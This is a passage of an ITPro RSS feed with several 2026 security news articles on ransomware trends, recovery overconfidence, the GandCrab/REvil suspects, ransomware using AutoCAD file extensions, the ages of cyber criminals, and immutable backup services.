                                                                                                                                                                                                                                    <media:description><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:description>                                                            <media:text><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:text>
                                <media:title type="plain"><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Cyber criminals are shifting away from high-volume “spray and pray” threat campaigns toward more targeted attacks to “maximize impact against fewer victims”. </p><p>That’s according to new research from SonicWall, which recorded a 20% increase in the number of compromised organizations across the UK last year, even as broader <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>volumes fell by 87%. </p><p>SonicWall noted that smaller businesses are among those most likely to be targeted in “big game hunting” ransomware campaigns. Figures published by the firm show ransomware was used in 88% of <a href="https://www.itpro.com/security/smb-security-gaps-drive-new-opportunities-for-channel-players">SMB breaches</a>, for example. </p><p>That marks a stark contrast to larger enterprises, in which just 39% of cases involved ransomware. </p><p>“The UK data for 2025 highlights ransomware is evolving into Big Game Hunting,” said Spencer Starkey, executive VP for EMEA at SonicWall. </p><p>“On the surface, the 87% drop in overall attack volume might look like progress, but the reality is more alarming. More organisations are being successfully hit, and attackers are doing it with far greater precision."</p><h2 id="targeting-zombie-tech">Targeting “zombie tech”</h2><p>SonicWall noted that threat actors are prioritizing attacks on organizations with less mature security environments, but also those operating on outdated infrastructure, or “zombie tech”. </p><p>Researchers highlighted a single decade-old vulnerability in Hikvision IP cameras accounted for 67 million attempted cyber attacks in the UK alone last year, representing 20% of all intrusion activities observed by the firm. </p><p>This single case underlines the risks posed to enterprises by vulnerabilities flying under the radar, according to SonicWall – and it comes at a time when flaws are being exploited at an even quicker pace. 
</p><p>Around 80% of IT leaders said they believe their organisation can detect a breach within eight hours, yet SonicWall findings show attackers can remain undetected for an average of around 181 days. </p><p>Automated threats are also growing, posing even bigger challenges for security teams. AI-enabled attacks increased by 89% in 2025, researchers noted, and bots are now generating 36,000 scans per second, scouring the web for potential vulnerabilities. </p><p>“Zombie Tech continues to haunt UK networks. We’re seeing millions of attacks tied to a single long-known vulnerability, alongside continued exploitation of issues first disclosed more than a decade ago,” Starkey said. </p><p>“Threats are becoming more sophisticated at the top end, while remaining highly exploitable at the base and organizations must address both.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Security leaders overconfident about ransomware recovery ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/security-leaders-overconfident-about-ransomware-recovery</link>
                                                                            <description>
                            <![CDATA[ Few manage to recover all their data, and many experience business disruption ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">bV89CY9avfhwgcdKxFmGWV</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 15 Apr 2026 12:21:24 +0000</pubDate>                                                                                                                                <updated>Wed, 15 Apr 2026 13:30:22 +0000</updated>
                                                                                                                                            <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Organizations are massively overestimating their ability to recover from a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attack, with most failing to recover all their data.</p><p>According to Veeam's <a href="https://go.veeam.com/data-trust-resilience-report">Data Trust and Resilience Report 2026</a>, while nine-in-ten security leaders believe they can recover quickly, only 28% manage to fully restore their data.  </p><p>On average, organizations recovered just 72% of affected data following a ransomware attack, while another 29% have ended up with data loss, downtime, or business disruption.</p><p>For cyber incidents generally, amongst organizations that fell victim in the past 12 months, more than 40% reported customer or constituent disruption. Around the same number reported financial loss or revenue impact, and 38% reported extended downtime of critical systems.</p><p>The researchers suggest that confidence in recovery is often boosted by the use of testing and planning – but that the frequency and realism of those tests are limited by operational and business pressures.</p><p>"Confidence in recovery from a ransomware attack is high, but the data tells a different story – and <a href="https://www.itpro.com/technology/artificial-intelligence/what-is-ai">AI</a> is only widening that gap," said Anand Eswaran, CEO of Veeam. "Even the most sophisticated organizations are discovering that confidence in recovery and proof of recovery are fundamentally different capabilities."</p><p>AI is only making things worse, thanks to new data flows, new attack surfaces, and new governance challenges. 
More than four-in-ten (43%) of respondents said AI tool adoption was outpacing their ability to secure data and models, and 42% have limited visibility into all the AI tools or models used across the organization, with a quarter saying shadow IT and unauthorized AI tool usage are a primary concern.</p><p>Four-in-ten said their security policies haven't yet been updated to include AI-specific risks, such as the use of generative AI.</p><p>The organizations that are doing well in terms of recovery, said Veeam, are those that have clear visibility into enterprise data and AI risk in production and in backup data, along with realistic testing and validation.</p><p>They also actually enforce security controls, rather than relying on policy alone, and have executive alignment on ownership, reporting, and what recovery actually means.</p><p>"Data resilience is still the hard requirement: knowing what data you have, where it lives, who can access it, and proving you can restore clean, trusted data fast when attackers – or operational failures – put the business under pressure," said Eswaran. </p><p>"The infrastructure for deploying AI has rapidly outpaced the ability to secure it. 
Organizations need end-to-end capabilities to understand, secure, protect, govern, and ensure their data is resilient at machine speed."</p><p>Last summer, <a href="https://www.itpro.com/cloud/cloud-security/cloud-breaches-check-point-security-report">Check Point's 2025 Cloud Security Report revealed</a> that while nearly two-thirds of organizations suffered a cloud security incident in the past year, only 6% of incidents were remediated within the first hour, with 62% of enterprises taking more than 24 hours to fully recover.</p><p>Meanwhile, research from cybersecurity firm ESET <a href="https://www.itpro.com/security/cyber-attacks/cyber-attacks-cost-uk-firms-64-billion-each-year">found</a> that 53% of UK businesses had fallen victim to at least one cyber attack over the last year, with 43% saying that this had had a long-term impact on business growth.</p><p>Costs included the extra staff time needed to deal with an attack, cited by nearly two-thirds of businesses, with others including ransom payments, stolen or lost funds, legal and regulatory costs, disruption to operations, and the cost of bringing in third-party expertise along with higher cyber insurance premiums.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ German authorities want your help finding the hackers behind GandCrab and REvil  ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/german-authorities-want-your-help-finding-the-hackers-behind-gandcrab-and-revil</link>
                                                                            <description>
                            <![CDATA[ Daniil Maksimovich Shchukin and Anatoly Sergeevitsch Kravchuk are believed to have made millions from ransomware as a service schemes ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">fdDCDsuwTqeNGjcqnLSn5n</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 07 Apr 2026 11:12:24 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>
                                                    <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                            <media:description><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:description>
                                                            <media:text><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>German police have identified two Russian hackers and are calling for help tracking them down.</p><p>The German Federal Criminal Police (BKA) said that 31-year-old Daniil Maksimovich Shchukin, who went by the handle 'UNKN', was behind the Russian ransomware groups GandCrab and REvil.</p><p>He is suspected of having carried out 130 incidents of gang-related extortion against German organizations, along with 43-year-old Anatoly Sergeevitsch Kravchuk, a Ukraine-born Russian citizen. </p><p>Kravchuk is accused of creating and further developing the dark web site used by the group to organize and manage extortion, as well as development of the malware itself.</p><p>Across 25 of the cases, the BKA said a total of €35.4 million was paid out in ransom payments.</p><p>"Based on investigations conducted so far, the wanted person is believed to be currently abroad, presumably in Russia. It is impossible to rule out potential travel," the BKA said.</p><p>"The police are interested in receiving a response to the following question: can you provide any information on the wanted person's current whereabouts?"</p><h2 id="revil-mastermind">REvil mastermind</h2><p>From the beginning of 2019 until at least July 2021, Shchukin acted as the head of one of the largest ransomware groups globally, known as GandCrab or, later, REvil. </p><p>"For the decryption and non-publication of data, the perpetrators demanded high ransoms," said the BKA. "In addition, in some cases, extensive data were also spied on and threatened with the publication of this, unless a ransom was paid."</p><p>GandCrab operated a <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service">ransomware as a service (RaaS)</a> model, primarily through the use of spam emails. It's believed to have netted a total of more than $2 billion from ransomware attacks, before evolving into REvil, also known as Sodinokibi, in 2019. 
</p><p>“We are a living proof that you can do evil and get off scot-free,” GandCrab said as it bowed out. “We have proved that one can make a lifetime of money in one year. We have proved that you can become number one by general admission, not in your own conceit.”</p><p>The group claimed to have been making $2.5 million per week.</p><p>"We personally earned more than 150 million dollars per year," Shchukin claimed. "We successfully cashed in this money and legalized it in various spheres of white business both in real life and on the internet." </p><p>In its next incarnation as REvil, the group targeted large organizations including IT management software firm Kaseya in a 2021 <a href="https://www.itpro.com/security/ransomware/360122/up-to-1500-organizations-compromised-in-kaseya-ransomware-attack"><u>supply chain attack</u></a> that saw as many as 1,500 organizations compromised.</p><p>Law enforcement agencies including the FBI were eventually able to infiltrate the group’s infrastructure and get hold of its decryption keys, which were then distributed to victims. </p><p>The US Justice Department also seized cryptocurrency worth more than $317,000 linked to wallets allegedly controlled by Shchukin.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ AutoCAD Users may have a ransomware problem – here's what they can do ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/autocad-users-may-have-a-ransomware-problem</link>
                                                                            <description>
                            <![CDATA[ A new malware family is currently using the same file types as the professional design software AutoCAD ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">B4u6c4kfpJkgcBqC3vih2Y</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/WxPq27FQZr4afzJkQmv5FW-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 12 Mar 2026 19:00:22 +0000</pubDate>
                                                    <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                    <dc:creator><![CDATA[ Peter Ray Allison ]]></dc:creator>
                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/WxPq27FQZr4afzJkQmv5FW-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                            <media:description><![CDATA[A CGI image of glowing blocks with padlocks on them, to represent ransomware.]]></media:description>
                                                            <media:text><![CDATA[A CGI image of glowing blocks with padlocks on them, to represent ransomware.]]></media:text>
                                <media:title type="plain"><![CDATA[A CGI image of glowing blocks with padlocks on them, to represent ransomware.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/WxPq27FQZr4afzJkQmv5FW-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.itpro.com/security/28084/what-is-ransomware"><u>Ransomware</u></a> is a widespread problem that’s plagued businesses for years, with particularly damaging financial and operational consequences. Attackers continually develop new strains of ransomware, finding new ways to bypass cybersecurity defenses and user vigilance. </p><p>In recent months, cybersecurity analysts have confirmed that attackers are disguising ransomware as file types for the industry standard computer-aided design (CAD) software AutoCAD, which is produced by Autodesk.</p><p>Veeam’s cybersecurity teams recently identified ransomware using AutoCAD file types. It’s just the latest ransomware danger that businesses have to watch out for, as the threat landscape expands and becomes more complicated.</p><p>Ransomware typically operates by tricking users into running a script, which downloads <a href="https://www.itpro.com/malware/28076/what-is-malware"><u>malware</u></a> into their system and then executes the code. The malware will then encrypt all files on the system and demand a ransom is paid to release the key to decrypt the files. The attackers may also threaten to release sensitive information. Ransomware has proved so successful that some hacking groups are offering <a href="https://www.itpro.com/security/29332/the-rise-of-ransomware-as-a-service"><u>malware as a service</u></a>.</p><h2 id="ransomware-disguised-as-autocad">Ransomware disguised as AutoCAD</h2><p>According to the revenue intelligence platform 6Sense, it has been <a href="https://6sense.com/tech/cad-software/autocad-market-share" target="_blank"><u>estimated</u></a> that AutoCAD has nearly 40% of the market share of CAD software. 
Given its ubiquitous nature in a wide variety of disciplines, including engineering and architecture, many of the larger engineering firms will often have thousands of AutoCAD packages installed throughout their network.</p><p>“It was in 2023 that ransomwares started reusing AutoCAD file extensions, and that makes it really confusing when you have a file extension of something that you know is okay, and then it's also associated with a <a href="https://www.itpro.com/security/cyber-attacks/what-is-an-apt"><u>threat actor</u></a>,” says Rick Vanover, vice president of product strategy at Veeam. </p><p>“That puts detection tools in the middle, because you can't just look at names, you have to then look at content. Organizations have to balance a broad air cover of detection versus a detailed confirmation.”</p><p>It is difficult to know for certain if using an AutoCAD file type was deliberate or not (unless those responsible come forward) but using the same file type as a widely deployed engineering package would be a logical way to overcome basic malware checks. While CAD users may well know to be suspicious of, for example, executable files, they are likely to be more trusting of AutoCAD files.</p><p>Organizations that use AutoCAD – and AutoDesk products – need to be vigilant. There may be a temptation to allow exceptions relating to this software, but that would leave the system exposed to ransomware attacks using the AutoCAD file types.</p><p>As malware has proliferated, cybersecurity developers have created tools to detect it. These tools are constantly iterating and evolving their defences, as they are updated with new versions of ransomware that are detected.</p><p>Other than informing users of ransomware disguising itself as an AutoCAD file, there seems very little that AutoDesk could do.</p><h2 id="the-cost-of-ransomware-attacks">The cost of ransomware attacks</h2><p>Ransomware attacks are incredibly damaging to organisations. 
Rebuilding from scratch is costly and time-consuming. There are additional costs of downtime and reputational damage, both from unscheduled suspension of services and the potential for data leaks. The UK’s <a href="https://www.itpro.com/security/what-is-the-national-cyber-security-centre-ncsc-and-what-does-it-do"><u>National Cyber Security Centre (NCSC)</u></a> has <a href="https://www.ncsc.gov.uk/section/respond-recover/ml-ransomware-attack"><u>advised against</u></a> paying a ransom.</p><p>Some organizations choose to pay the ransom, but there are additional risks with trusting criminals. Furthermore, the victim will have revealed that they are willing to pay ransoms and will therefore <a href="https://www.itpro.com/security/ransomware/nearly-one-third-of-ransomware-victims-are-hit-multiple-times-even-after-paying-up-to-hackers"><u>increase their chances of being targeted again</u></a> in the future.</p><p>“I honestly would not trust a cleaning of a file. Would you really trust that data after it's been touched twice by the threat actor?” asks Vanover. “I'm not much of a fire extinguisher, guy. I'm much more of a rebuild the building type, in a data way.”</p><p>If organizations choose to rebuild after a ransomware attack, they can be confident that their data has not been tampered with by malicious actors who may have left a metaphorical time bomb in their system.</p><p>Preparations can be undertaken to mitigate the time and resources spent in restoring systems by utilizing a <a href="https://www.itpro.com/back-up/29084/how-to-enhance-your-backup-strategy"><u>robust backup policy</u></a> that incorporates multiple restore points in various locations, as well as redundancy systems that can be activated when necessary. 
Although such measures naturally require time and resources to be properly deployed, they will mitigate the much larger costs of rebuilding, as well as minimising the associated reputational harm.</p><h2 id="the-future-of-ransomware">The future of ransomware</h2><p>Ransomware will continue to proliferate, especially as it is so lucrative for organized crime groups. If we assume that the utilization of AutoCAD file types is deliberate, then we should also expect hackers to adopt other popular industry standard software file types, to avoid detection.</p><p>A consequence of the constant cybersecurity arms race is that there is now a colossal catalogue of malware that needs to be tracked and guarded against. Furthermore, as malware detection tools have become increasingly sensitive to potential attacks, more detections will be made, thus increasing the number of false positives.</p><p>The growing number of <a href="https://www.itpro.com/software/windows/microsoft-defender-obliterating-users-with-false-password-alerts">false positives</a> could potentially overwhelm administrators and thereby inadvertently allow mistakes to happen, due to there being too much information for them to properly process.</p><p>AI solutions may be beneficial here, as an AI tool can quickly sift through a large number of notifications, to prioritise those that require the administrator’s attention.</p><p>Unfortunately, the lucrative nature of ransomware means that it is here to stay. We will continue to see new versions being developed, and we will likely see more that mimic previously trusted file types. It is therefore essential for enterprises to have malware detection systems in place, alongside up-to-date user training, a robust backup system, sandbox testing, system restore policies and failover measures.</p><p>“<a href="https://www.itpro.com/security/data-protection/data-sovereignty-a-growing-priority-for-uk-enterprises"><u>Data sovereignty</u></a> is more important than ever. Organisations need to ensure that they have their data and the control of it,” says Vanover.</p><p>AutoDesk were approached for comment, but did not respond at time of publication.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The rise of teen hackers ‘makes for a good headline’, but cyber crime activities peak later in life ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/the-rise-of-teen-hackers-makes-for-a-good-headline-but-cyber-crime-activities-peak-later-in-life</link>
                                                                            <description>
                            <![CDATA[ With family responsibilities and mortgages to pay, it's not teenagers dishing out malware or carrying out cyber extortion ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">AixB4pKPDWgHro8HrA47Jg</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 11 Mar 2026 10:56:05 +0000</pubDate>
                                                    <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>
                                                    <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                            <media:description><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:description>
                                                            <media:text><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker concept image showing silhouette of a hooded individual using a laptop computer with binary code imposed against a red backdrop. ]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pjqoPws66yCB4ujEfq3dte-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>While much emphasis has been placed on the <a href="https://www.itpro.com/security/channel-their-curiosity-into-something-meaningful-cyber-expert-warns-an-uptick-of-youth-hackers-should-be-a-wake-up-call-after-teens-charged-over-tfl-attack">rise of youth cyber crime</a> over the last two years, new research shows hacker activity peaks much later. </p><p>Orange Cyberdefense looked at the numbers and found that it's actually thirty- and forty-somethings that are the greatest threat.  </p><p>The company’s intelligence team <a href="https://www.orangecyberdefense.com/uk/security-navigator"><u>analyzed</u></a> 418 publicly announced law enforcement activities between 2021 and mid-2025 and found that offenders’ activities peaked between the ages of 35 and 44. This age group, they said, accounted for 37% of cyber crime cases.</p><p>Put together, the combined age groups of 25-to-44 make up well over half (58%) of analyzed cyber crime cases. </p><p>Only one-in-five (21%) incidents were the work of 18-to-24-year-olds. Despite the bad press they get in movies and the news, 12-to-17s were behind fewer than 5% of cases.</p><p>“The surge in cyber offences committed by teenagers in recent years may be creating a false impression of the age of today's cyber criminals," said Charl van der Walt, head of security research at Orange Cyberdefense. </p><p>"The sensationalist interpretation of cyber crime's youthfulness makes for a good headline, but these findings appear to tell a different story."</p><h2 id="differing-motives">Differing motives</h2><p>One big difference between the kids and their elders is the underlying motivation behind attacks, researchers noted. As you might expect, younger hackers are frequently experimenting while the older cohort is in it primarily for financial gain. 
</p><p>Among 18-24-year-olds, cyber criminal activity is highly diverse, though there's a focus on hacking (30%) in particular, followed by selling stolen data and <a href="https://www.itpro.com/security/28026/what-is-a-ddos-attack">DDoS attacks</a> (10% each).</p><p>Things start to change among offenders aged between 25 and 34, who tend to focus on more profitable activities such as selling stolen data (21%), cyber extortion (14%) and <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>deployment (12%). </p><p>This trend continues among 35-to-44 year olds, where <a href="https://www.itpro.com/security/ransomware/369222/what-is-triple-extortion-ransomware">cyber extortion</a> (22%) is the crime of choice, followed by malware (19%) and <a href="https://www.itpro.com/security/28170/what-is-cyber-warfare">cyber espionage</a> (13%), hacking (10%), and money laundering (7%). </p><p>"While younger, less experienced hackers engage in highly diverse – and often noticed and reported – actions, they may be less likely to engage in calculated, profit seeking activity," said van der Walt. </p><p>"Instead, cyber crime careers appear to peak much later into adulthood, accompanied by vastly more sophisticated and intentional techniques.”</p><p>Some of those teen-related activities are very high profile indeed. 
Late last year, for example, a 15-year-old was <a href="https://www.itpro.com/security/cyber-crime/15-year-old-revealed-as-key-player-in-scattered-lapsus-usd-hunters">outed by security researcher Brian Krebs</a> as a member of Scattered LAPSUS$ Hunters – the group responsible for the Jaguar Land Rover (JLR) and M&S cyber attacks.</p><p>Two teenagers, meanwhile, are set to face charges for the 2024 <a href="https://www.itpro.com/security/cyber-attacks/everything-we-know-about-the-tfl-cyber-attack-so-far"><u>hack of Transport for London</u></a> (TfL), while another pair have been <a href="https://www.itpro.com/security/teens-arrested-over-nursery-chain-kido-hack"><u>arrested</u></a> for the data breach of the Kido chain of children's nurseries.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware protection for all: How consumption-based subscription models can lower the entry point for cyber resilience ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-protection-for-all-how-consumption-based-subscription-models-can-lower-the-entry-point-for-cyber-resilience</link>
                                                                            <description>
                            <![CDATA[ Consumption-based immutable backup makes enterprise-grade ransomware resilience affordable to all ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">ATGHvAADU6C5qmh3hGqVDZ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 18 Feb 2026 08:00:00 +0000</pubDate>
                                                    <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                    <dc:creator><![CDATA[ Pete Hannah ]]></dc:creator>
                                                    <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/2WmsrfXVrSsbXREFVdJdFQ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                            <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>
                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Ransomware is accelerating at an alarming pace. Europe is headed toward its worst year yet for ransomware incidents, up about <a href="https://www.storagenewsletter.com/2025/09/17/research-confirms-europes-ransomware-attacks-set-2025-record/"><u>80% in 2024, with 2025 already breaking previous records</u></a>. </p><p>Downtime caused by these attacks, not just the ransom, is one of the most damaging outcomes. For many mid-market organizations, losing access to critical systems for days or weeks can mean disastrous financial, operational, and reputational damage. This also causes a strong impact on IT staff mental health, where <a href="https://betanews.com/2025/10/02/security-risks-leave-84-percent-of-it-pros-feeling-stressed-at-work/"><u>84%</u></a> of IT professionals feel uncomfortably stressed at work amid rising cybersecurity threats.</p><p>Immutable backup storage is one of the most effective defenses. Once data is written, it can’t be altered or deleted, meaning it’s always available for recovery after an attack.  However, enterprise-grade backup storage has sometimes been seen as out of reach for small and medium-sized organizations, with unnecessarily high entry points in terms of capacity and capital expenditure.</p><p>Now, that’s changing. Consumption-based subscription models are breaking down these barriers by bringing enterprise-level protection to a much wider range of businesses. By offering predictable monthly billing, these models are levelling the playing field, and for channel partners, they’re also creating new recurring-revenue opportunities.</p><h2 id="ransomware-protection-for-all">Ransomware protection for all</h2><p>Ransomware is no longer a problem that only hits large enterprises. With Ransomware-as-a-service platforms, attackers can automate campaigns and scale their reach across businesses of every size. 
Mid-market firms, often seen as ‘too small’ to attract sophisticated attacks, are increasingly in cyber criminals’ crosshairs because they may have fewer protections in place.</p><p>This shift puts the channel in a pivotal position. Managed service providers (MSPs), value-added resellers (VARs), and system integrators (SIs) can now deliver enterprise-grade ransomware protection to clients of any size through consumption-based models. </p><p>Instead of large capital outlays, partners can help customers deploy immutable backup solutions on a predictable, subscription basis, reducing friction and speeding up adoption.</p><p>It's not just about affordability. This model fosters long-term recurring revenue and deeper customer relationships built on ongoing protection rather than one-off sales. In an era where trust and resilience are critical, that combination of commercial and security value is compelling.</p><h2 id="backup-as-the-new-frontline">Backup as the new frontline</h2><p>The modern approach to ransomware must start with the assumption that a breach will inevitably happen. Preventative tools remain crucial, but downtime from attacks, even when ransoms aren’t paid, can be devastating. </p><p>Immutable backups shift the focus from reactive recovery to proactive assurance. By ensuring data cannot be encrypted, deleted, or modified once written, businesses can be confident they have a reliable way to recover after an attack. That confidence is invaluable for IT teams facing today’s constant threat pressure.</p><p>For the channel, it’s also an opportunity to evolve conversations from “prevention” to resilience. Partners can help customers build recovery strategies that meet compliance and insurance requirements, while delivering managed backup and recovery services that generate recurring revenue. 
Immutability, once a niche enterprise feature, is fast becoming a core managed service differentiator.</p><h2 id="immutability-for-the-mid-market">Immutability for the mid-market</h2><p>Smaller firms face a particular challenge: like larger enterprises, they handle sensitive data, but they often lack the resources to secure it to the same standard. Attackers know this and increasingly target mid-market organizations as ‘low-hanging fruit’.</p><p>Consumption-based subscription models help partners close that gap. They can offer mid-market customers enterprise-grade immutability and recovery without the budget hurdles that previously slowed adoption.</p><p>For MSPs and VARs, this flexibility creates tangible business advantages. They can scale protection alongside their customers’ growth, adjust resources, and bundle ransomware protection into broader managed services. The result is a sustainable service model in which customers gain access to protection and partners gain predictable revenue.</p><h2 id="insurance-ready-backups">Insurance-ready backups</h2><p>Cyber-insurance requirements are tightening: insurers increasingly demand verifiable immutable backups and tested recovery time objectives (RTOs) as conditions of coverage. Firms that cannot demonstrate these capabilities may face higher premiums or denied claims.</p><p>Immutable backup solutions simplify this process and position partners to help customers meet insurer expectations. By offering managed immutable backup and recovery services, MSPs can support compliance reporting while delivering faster recovery and strengthening clients’ security. </p><p>This builds trust with customers and insurers, enhancing both protection and revenue for the channel.</p><h2 id="a-model-built-for-resilience">A model built for resilience</h2><p>Today, ransomware does not discriminate. Every organization and every partner serving them faces the same pressure to recover quickly. 
In the fight against ransomware, no partner or customer stands alone. Resilience grows from collaboration, a connected ecosystem where vendors, MSPs, and customers all play their part.</p><p>Consumption-based immutability makes resilience achievable for all. It allows partners to deliver enterprise-grade backup protection to any customer, regardless of size, while building steady revenue streams. Predictable billing supports long-term customer relationships and margin planning, turning security into a shared business goal between provider and client.</p><p>As ransomware threats continue to rise, resilience will be defined by recovery readiness, not by prevention alone. Immutable backups delivered through flexible, subscription-based models help every organization restore operations quickly while protecting its reputation and maintaining trust. For the channel, that’s not just a service opportunity; it’s also a chance to lead in shaping the next era of cyber resilience.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware gangs are using employee monitoring software as a springboard for cyber attacks ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware-gangs-are-using-employee-monitoring-software-as-a-springboard-for-cyber-attacks</link>
                                                                            <description>
                            <![CDATA[ Two attempted attacks aimed to exploit Net Monitor for Employees Professional and SimpleHelp ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">UxUKdS2z5Viemd7oCX52w4</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/4w6boC4sd6Rmk2mt6aw3Ud-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
